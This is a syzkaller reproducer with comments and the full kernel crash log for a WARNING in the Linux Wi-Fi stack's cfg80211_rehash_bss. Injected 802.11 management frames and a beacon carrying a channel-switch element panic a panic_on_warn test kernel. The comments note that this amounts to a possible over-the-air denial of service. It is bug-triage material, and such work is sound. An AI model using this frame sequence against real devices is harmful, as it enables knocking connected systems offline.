# syzkaller reproducer for the WARNING at net/wireless/scan.c:1666 in cfg80211_rehash_bss,
# reached from ieee80211_rx_mgmt_beacon -> ieee80211_sta_process_chanswitch ->
# cfg80211_ch_switch_notify -> cfg80211_update_assoc_bss_entry while the station on wlan1
# (mac80211_hwsim, see the log below) processes an injected beacon that carries a Channel
# Switch Announcement. The test kernel runs with panic_on_warn, so the WARN turns into a panic.
#
# Security note: every frame that drives the crash path is an unauthenticated 802.11
# management frame (probe response, auth, assoc response, beacon) injected "from" the AP
# address. A radio-range attacker who can spoof the associated AP's BSSID can therefore push
# a connected station down the same path; on a panic_on_warn kernel that is a remote denial
# of service. What the WARN at scan.c:1666 actually checks, and whether the BSS table is left
# inconsistent on a kernel without panic_on_warn, is not visible from this log and has to be
# confirmed against the source.
#
# The KCM/NFC-LLCP sendmmsg and the syz_usb_connect$hid call below do not appear anywhere in
# the stack trace and look like fuzzer noise; they are the first candidates to drop when
# minimizing this reproducer.
#
# generic netlink socket plus the nl80211 family id used for the two nl80211 commands below
program: r0 = socket$nl_generic(0x10, 0x3, 0x10)
r1 = syz_genetlink_get_family_id$nl80211(&(0x7f0000000080), 0xffffffffffffffff)
# ifindex lookup for wlan1; r2 (used as NL80211_ATTR_IFINDEX below) is presumably the ifindex
# this ioctl writes back -- the <r2=> binding is not shown in the listing as copied, verify
ioctl$sock_SIOCGIFINDEX_80211(r0, 0x8933, &(0x7f00000000c0)={'wlan1\x00', 0x0})
# NL80211_CMD_SET_INTERFACE: put wlan1 into station mode (NL80211_ATTR_IFTYPE = 0x2, station)
sendmsg$NL80211_CMD_SET_INTERFACE(r0, &(0x7f0000000100)={0x0, 0x0, &(0x7f0000000140)={&(0x7f0000000180)={0x24, r1, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r2}, @void}}, [@NL80211_ATTR_IFTYPE={0x8, 0x5, 0x2}]}, 0x24}}, 0x0)
# NL80211_CMD_CONNECT: ask wlan1 to connect to the default AP SSID; the WIPHY_FREQ attribute is
# sent with its value left at 0, i.e. any frequency
sendmsg$NL80211_CMD_CONNECT(r0, &(0x7f00000001c0)={0x0, 0x0, &(0x7f0000000380)={&(0x7f0000000240)={0x30, r1, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r2}, @void}}, [@NL80211_ATTR_SSID={0xa, 0x34, @default_ap_ssid}, @chandef_params=[@NL80211_ATTR_WIPHY_FREQ={0x8}]]}, 0x30}}, 0x0)
# unrelated to the crash path: a KCM socket sending one message to an NFC LLCP address
r3 = socket$kcm(0x2d, 0x2, 0x0)
sendmmsg(r3, &(0x7f00000004c0)=[{{&(0x7f0000000080)=@nfc_llcp={0x2d, 0x0, 0x10000000, 0x7, 0x4, 0x7, "47af57ce8c8e5af84d109ee7a1488bd8c3df97e87f7e771f69ced4c5de6ddeb44ee59bdfb62866129f1338dba84b5d82a121c369a6837123e849c909c16b53", 0x2d}, 0x80, 0x0}}], 0x1, 0x8000)
# the fake AP (device_b) answers the station's (device_a) scan with a probe response for the
# default SSID so that the connect request has a BSS to target
syz_80211_inject_frame(&(0x7f00000002c0)=@device_b, &(0x7f0000000000)=@mgmt_frame=@probe_response={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x20}}, 0x0, @random=0x4, 0x1, @val={0x0, 0x6, @default_ap_ssid}, @val={0x1, 0x1, [{0x2, 0x1}]}, @void, @void, @void, @void, @void, @val={0x71, 0x7, {0x1, 0x1, 0xffffffffffffffff, 0x0, 0xffffffffffffffff, 0xf3}}}, 0x38)
# 50 ms (0x2faf080 ns): gives the scan/connect state machine time to consume the probe response
nanosleep(&(0x7f0000000340)={0x0, 0x2faf080}, 0x0)
# fake AP accepts authentication (log: "wlan1: authenticated")
syz_80211_inject_frame(&(0x7f00000003c0)=@device_b, &(0x7f0000000400)=@mgmt_frame=@auth={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x1}}, 0x0, 0x2, 0x0, @void}, 0x1e)
# fake AP accepts association with capab=0x1, status 0
# (log: "RX AssocResp ... (capab=0x1 status=0 aid=1)" followed by "wlan1: associated")
syz_80211_inject_frame(&(0x7f00000004c0)=@device_b, &(0x7f0000000500)=@mgmt_frame=@assoc_resp={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x2}}, 0x1, 0x0, @default, @val, @void}, 0x20)
# first beacon from the now-associated AP. Relevant IEs:
#   0x25 Channel Switch Announcement      {mode 0x0, new channel 0x2, count 0x4}
#   0x3c Extended Channel Switch Announc. {mode 0x0, op class 0x3d (61), new channel 0xab, count 0x5}
# The ECSA operating class 61 is rejected by mac80211 ("cannot understand ECSA IE operating
# class, 61, ignoring"), so the plain CSA IE is what drives the channel switch. The remaining
# IEs (apparently TIM 0x5, ERP 0x2a, HT capabilities 0x2d, and 0x71/0x76) are not referenced
# by the splat.
syz_80211_inject_frame(&(0x7f0000000300)=@device_b, &(0x7f00000008c0)=@mgmt_frame=@beacon={{{}, {}, @device_b, @device_b, @from_mac}, 0x0, @default, 0x1, @void, @void, @void, @void, @void, @val={0x5, 0x3, {0x7c, 0x20, 0x8}}, @val={0x25, 0x3, {0x0, 0x2, 0x4}}, @val={0x2a, 0x1, {0x1, 0x1}}, @val={0x3c, 0x4, {0x0, 0x3d, 0xab, 0x5}}, @val={0x2d, 0x1a, {0x8, 0x3, 0x1, 0x0, {0x5, 0x9, 0x0, 0x6, 0x0, 0x1, 0x0, 0x0, 0x1}, 0x6, 0x4, 0x5}}, @void, @val={0x71, 0x7, {0x0, 0x1, 0x0, 0x0, 0x0, 0x2, 0x21}}, @val={0x76, 0x6, {0x0, 0x9, 0x3d, 0x1}}}, 0x64)
# unrelated to the crash path: plugs in a bogus USB HID gadget on dummy_hcd
# (log: "config 0 has no interfaces?", "config 0 descriptor??")
syz_usb_connect$hid(0x0, 0x36, &(0x7f0000000340)=ANY=[@ANYBLOB="12013f00000000407f04ffff0000000000010902"], 0x0)
# second beacon with the same CSA (0x25) / ECSA (0x3c) IEs, this time also carrying the SSID.
# The log shows the second "cannot understand ECSA IE operating class, 61" message immediately
# before the "cut here" line, so this is the frame whose channel-switch handling reaches the
# WARN in cfg80211_rehash_bss.
syz_80211_inject_frame(&(0x7f0000000300)=@device_b, &(0x7f0000000440)=@mgmt_frame=@beacon={{{}, {}, @device_b, @device_b, @from_mac}, 0x0, @default, 0x0, @val={0x0, 0x6, @default_ap_ssid}, @void, @void, @val={0x4, 0x6, {0xe, 0x0, 0x1000, 0x5}}, @void, @val={0x5, 0x3, {0x7c, 0x20, 0x8}}, @val={0x25, 0x3, {0x0, 0x2, 0x4}}, @val={0x2a, 0x1, {0x1, 0x1}}, @val={0x3c, 0x4, {0x0, 0x3d, 0xab, 0x5}}, @void, @void, @val={0x71, 0x7, {0x0, 0x3, 0x0, 0x0, 0x0, 0x2, 0x21}}, @val={0x76, 0x6, {0x0, 0x9, 0x3d, 0x1}}}, 0x58)
[ 74.486669][ T4677] Bluetooth: hci0: command tx timeout [ 74.598865][ T5331] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 74.632496][ T795] wlan1: authenticate with 08:02:11:00:00:00 (local address=08:02:11:00:00:01) [ 74.636324][ T795] wlan1: send auth to 08:02:11:00:00:00 (try 1/3) [ 74.654928][ T38] wlan1: authenticated [ 74.657200][ T5331] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 74.662233][ T38] wlan1: associate with 08:02:11:00:00:00 (try 1/3) [ 74.666281][ T38] wlan1: RX AssocResp from 08:02:11:00:00:00 (capab=0x1 status=0 aid=1) [ 74.671213][ T5331] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 74.675672][ T38] wlan1: associated [ 74.680053][ T38] wlan1: cannot understand ECSA IE operating class, 61, ignoring [ 74.684495][ T5331] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 74.948223][ T795] usb 5-1: new high-speed USB device number 2 using 
dummy_hcd [ 75.100953][ T795] usb 5-1: config 0 has no interfaces? [ 75.103444][ T795] usb 5-1: New USB device found, idVendor=047f, idProduct=ffff, bcdDevice= 0.00 [ 75.107301][ T795] usb 5-1: New USB device strings: Mfr=0, Product=0, SerialNumber=0 [ 75.118488][ T795] usb 5-1: config 0 descriptor?? [ 75.324409][ T38] wlan1: cannot understand ECSA IE operating class, 61, ignoring [ 75.328088][ T38] ------------[ cut here ]------------ [ 75.330348][ T38] WARNING: net/wireless/scan.c:1666 at cfg80211_rehash_bss+0x1e6/0x540, CPU#0: kworker/u4:3/38 [ 75.334571][ T38] Modules linked in: [ 75.336376][ T38] CPU: 0 UID: 0 PID: 38 Comm: kworker/u4:3 Not tainted syzkaller #0 PREEMPT(full) [ 75.340542][ T38] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 75.345234][ T38] Workqueue: events_unbound cfg80211_wiphy_work [ 75.348055][ T38] RIP: 0010:cfg80211_rehash_bss+0x1e6/0x540 [ 75.350689][ T38] Code: e8 48 c1 e8 03 42 0f b6 04 30 84 c0 0f 85 33 03 00 00 ff 45 00 48 83 c4 18 5b 41 5c 41 5d 41 5e 41 5f 5d e9 bc 03 b0 00 cc 90 <0f> 0b 90 4c 8b 2c 24 4c 89 ef e8 5b eb ea f9 84 c0 74 78 e8 e2 98 [ 75.358236][ T38] RSP: 0018:ffffc900009b6f20 EFLAGS: 00010246 [ 75.360786][ T38] RAX: ffffffff8aae6b25 RBX: 0000000000000000 RCX: 0000000000000002 [ 75.364306][ T38] RDX: ffff88801eb3a4c0 RSI: 0000000000000000 RDI: 0000000000000000 [ 75.367463][ T38] RBP: ffff88801234ec68 R08: 0000000000000000 R09: 0000000000000002 [ 75.370780][ T38] R10: 0000000000000002 R11: 0000000000000002 R12: ffff8880122481a0 [ 75.374317][ T38] R13: ffff88801234f830 R14: dffffc0000000000 R15: ffff888011f3b420 [ 75.377911][ T38] FS: 0000000000000000(0000) GS:ffff88808d416000(0000) knlGS:0000000000000000 [ 75.381901][ T38] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 75.385113][ T38] CR2: 00007f9c7a1ba190 CR3: 00000000354f0000 CR4: 0000000000352ef0 [ 75.388829][ T38] Call Trace: [ 75.390323][ T38] [ 75.391598][ T38] 
cfg80211_update_assoc_bss_entry+0x3fa/0x6a0 [ 75.394412][ T38] cfg80211_ch_switch_notify+0x3c1/0x770 [ 75.396672][ T38] ieee80211_sta_process_chanswitch+0xb05/0x2890 [ 75.398991][ T38] ? __pfx_ieee80211_sta_process_chanswitch+0x10/0x10 [ 75.401517][ T38] ? __pfx_do_raw_spin_lock+0x10/0x10 [ 75.403837][ T38] ? __local_bh_enable_ip+0xd0/0x130 [ 75.405996][ T38] ieee80211_rx_mgmt_beacon+0x1d6f/0x3230 [ 75.408445][ T38] ? __pfx_ieee80211_rx_mgmt_beacon+0x10/0x10 [ 75.410827][ T38] ? trace_pelt_se_tp+0x39/0x120 [ 75.412960][ T38] ? __update_load_avg_se+0x751/0xbc0 [ 75.415204][ T38] ieee80211_sta_rx_queued_mgmt+0x4ed/0x4520 [ 75.417594][ T38] ? inat_get_escape_attribute+0x109/0x190 [ 75.419957][ T38] ? __pfx_ieee80211_sta_rx_queued_mgmt+0x10/0x10 [ 75.422764][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.424935][ T38] ? __pte_offset_map_lock+0x13e/0x210 [ 75.427307][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.429316][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.431312][ T38] ? kmem_cache_alloc_bulk_noprof+0x71/0x720 [ 75.433695][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.435685][ T38] ? __pfx___mutex_trylock_common+0x10/0x10 [ 75.438151][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.440016][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.442180][ T38] ? kcov_remote_start+0x49b/0x7a0 [ 75.444156][ T38] ieee80211_iface_work+0x652/0x12d0 [ 75.446264][ T38] cfg80211_wiphy_work+0x2ab/0x450 [ 75.448390][ T38] ? process_scheduled_works+0x9ef/0x1770 [ 75.451004][ T38] process_scheduled_works+0xad1/0x1770 [ 75.453500][ T38] ? __pfx_process_scheduled_works+0x10/0x10 [ 75.456007][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.458227][ T38] worker_thread+0x8a0/0xda0 [ 75.460278][ T38] kthread+0x711/0x8a0 [ 75.462443][ T38] ? __pfx_worker_thread+0x10/0x10 [ 75.465006][ T38] ? __pfx_kthread+0x10/0x10 [ 75.467109][ T38] ? _raw_spin_unlock_irq+0x23/0x50 [ 75.469592][ T38] ? __pfx_kthread+0x10/0x10 [ 75.471541][ T38] ret_from_fork+0x510/0xa50 [ 75.473648][ T38] ? __pfx_ret_from_fork+0x10/0x10 [ 75.475920][ T38] ? 
__switch_to+0xc9e/0x1480 [ 75.478067][ T38] ? __pfx_kthread+0x10/0x10 [ 75.480033][ T38] ret_from_fork_asm+0x1a/0x30 [ 75.482349][ T38] [ 75.483814][ T38] Kernel panic - not syncing: kernel: panic_on_warn set ... [ 75.486783][ T38] CPU: 0 UID: 0 PID: 38 Comm: kworker/u4:3 Not tainted syzkaller #0 PREEMPT(full) [ 75.490839][ T38] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 75.495464][ T38] Workqueue: events_unbound cfg80211_wiphy_work [ 75.498868][ T38] Call Trace: [ 75.500418][ T38] [ 75.501828][ T38] vpanic+0x1e0/0x670 [ 75.503961][ T38] panic+0xb9/0xc0 [ 75.505699][ T38] ? __pfx_panic+0x10/0x10 [ 75.507784][ T38] ? ret_from_fork_asm+0x1a/0x30 [ 75.509842][ T38] __warn+0x317/0x4b0 [ 75.511422][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.513498][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.515526][ T38] __report_bug+0x288/0x500 [ 75.517625][ T38] ? do_raw_spin_unlock+0x4d/0x240 [ 75.519948][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.522382][ T38] ? __pfx___report_bug+0x10/0x10 [ 75.524578][ T38] ? _ieee80211_wake_txqs+0x90a/0xa70 [ 75.526649][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.528947][ T38] ? _ieee80211_wake_txqs+0x2a/0xa70 [ 75.531324][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.533719][ T38] report_bug+0x16a/0x220 [ 75.535620][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.538061][ T38] ? 
cfg80211_rehash_bss+0x1e8/0x540 [ 75.540417][ T38] handle_bug+0x98/0x200 [ 75.542376][ T38] exc_invalid_op+0x1a/0x50 [ 75.544510][ T38] asm_exc_invalid_op+0x1a/0x20 [ 75.546690][ T38] RIP: 0010:cfg80211_rehash_bss+0x1e6/0x540 [ 75.548883][ T38] Code: e8 48 c1 e8 03 42 0f b6 04 30 84 c0 0f 85 33 03 00 00 ff 45 00 48 83 c4 18 5b 41 5c 41 5d 41 5e 41 5f 5d e9 bc 03 b0 00 cc 90 <0f> 0b 90 4c 8b 2c 24 4c 89 ef e8 5b eb ea f9 84 c0 74 78 e8 e2 98 [ 75.555646][ T38] RSP: 0018:ffffc900009b6f20 EFLAGS: 00010246 [ 75.557740][ T38] RAX: ffffffff8aae6b25 RBX: 0000000000000000 RCX: 0000000000000002 [ 75.560567][ T38] RDX: ffff88801eb3a4c0 RSI: 0000000000000000 RDI: 0000000000000000 [ 75.563725][ T38] RBP: ffff88801234ec68 R08: 0000000000000000 R09: 0000000000000002 [ 75.566752][ T38] R10: 0000000000000002 R11: 0000000000000002 R12: ffff8880122481a0 [ 75.570259][ T38] R13: ffff88801234f830 R14: dffffc0000000000 R15: ffff888011f3b420 [ 75.573747][ T38] ? cfg80211_rehash_bss+0xe5/0x540 [ 75.575920][ T38] cfg80211_update_assoc_bss_entry+0x3fa/0x6a0 [ 75.578735][ T38] cfg80211_ch_switch_notify+0x3c1/0x770 [ 75.581160][ T38] ieee80211_sta_process_chanswitch+0xb05/0x2890 [ 75.583995][ T38] ? __pfx_ieee80211_sta_process_chanswitch+0x10/0x10 [ 75.586918][ T38] ? __pfx_do_raw_spin_lock+0x10/0x10 [ 75.589199][ T38] ? __local_bh_enable_ip+0xd0/0x130 [ 75.591333][ T38] ieee80211_rx_mgmt_beacon+0x1d6f/0x3230 [ 75.593987][ T38] ? __pfx_ieee80211_rx_mgmt_beacon+0x10/0x10 [ 75.596553][ T38] ? trace_pelt_se_tp+0x39/0x120 [ 75.598605][ T38] ? __update_load_avg_se+0x751/0xbc0 [ 75.601033][ T38] ieee80211_sta_rx_queued_mgmt+0x4ed/0x4520 [ 75.603592][ T38] ? inat_get_escape_attribute+0x109/0x190 [ 75.606069][ T38] ? __pfx_ieee80211_sta_rx_queued_mgmt+0x10/0x10 [ 75.608780][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.610986][ T38] ? __pte_offset_map_lock+0x13e/0x210 [ 75.613395][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.615515][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.617776][ T38] ? 
kmem_cache_alloc_bulk_noprof+0x71/0x720 [ 75.620390][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.622549][ T38] ? __pfx___mutex_trylock_common+0x10/0x10 [ 75.625032][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.627100][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.629248][ T38] ? kcov_remote_start+0x49b/0x7a0 [ 75.631381][ T38] ieee80211_iface_work+0x652/0x12d0 [ 75.633617][ T38] cfg80211_wiphy_work+0x2ab/0x450 [ 75.636014][ T38] ? process_scheduled_works+0x9ef/0x1770 [ 75.638589][ T38] process_scheduled_works+0xad1/0x1770 [ 75.640828][ T38] ? __pfx_process_scheduled_works+0x10/0x10 [ 75.643275][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.645400][ T38] worker_thread+0x8a0/0xda0 [ 75.647396][ T38] kthread+0x711/0x8a0 [ 75.649175][ T38] ? __pfx_worker_thread+0x10/0x10 [ 75.651405][ T38] ? __pfx_kthread+0x10/0x10 [ 75.653468][ T38] ? _raw_spin_unlock_irq+0x23/0x50 [ 75.655550][ T38] ? __pfx_kthread+0x10/0x10 [ 75.657626][ T38] ret_from_fork+0x510/0xa50 [ 75.659780][ T38] ? __pfx_ret_from_fork+0x10/0x10 [ 75.662075][ T38] ? __switch_to+0xc9e/0x1480 [ 75.664666][ T38] ? __pfx_kthread+0x10/0x10 [ 75.667186][ T38] ret_from_fork_asm+0x1a/0x30 [ 75.669858][ T38] [ 75.671663][ T38] Kernel Offset: disabled [ 75.673440][ T38] Rebooting in 86400 seconds..